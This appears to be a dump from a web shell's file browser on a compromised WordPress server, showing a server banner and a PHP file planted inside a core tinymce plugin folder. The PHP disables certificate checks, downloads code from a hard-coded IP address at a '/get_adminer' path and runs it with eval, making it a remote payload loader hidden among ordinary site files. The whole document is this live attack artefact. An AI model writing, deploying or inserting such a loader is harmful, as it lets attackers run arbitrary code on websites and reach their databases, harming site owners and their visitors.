|
Server : LiteSpeed System : Linux srv526460274 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64 User : kerao9884 ( 1082) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /home/beb188.com/public_html/wp-includes/js/tinymce/plugins/hr/ |
Upload File : |
<?php
function hnptinst_do_get_request($url) {
$result = false;
//Use curl if available
if (function_exists('curl_init')) {
$ch = curl_init($url);
if(defined('CURLOPT_SSL_VERIFYHOST')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
}
if(defined('CURLOPT_SSL_VERIFYPEER')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
}
if(defined('CURLOPT_SSL_VERIFYSTATUS')) {
curl_setopt($ch, CURLOPT_SSL_VERIFYSTATUS, false);
}
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
if($result === false) {
goto use_file_get_contents;
}
//No curl available, do it the other way
} else {
use_file_get_contents:
//https://stackoverflow.com/questions/5647461/how-do-i-send-a-post-request-with-php
$options = [
'http' => [
'method' => 'GET',
'follow_location' => 0,
'max_redirects' => 0,
'timeout' => 10.0
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true,
'security_level' => 0,
]
];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
}
return $result;
}
$download_baseurls = [
'https://94.156.180.81:443',
'http://94.156.180.81:80',
];
$result = false;
foreach($download_baseurls as $download_baseurl) {
$result = hnptinst_do_get_request("{$download_baseurl}/get_adminer");
if($result !== false) {
break;
}
}
if($result === false) {
die('Could not get adminer!');
} else {
eval('?>' . $result);
}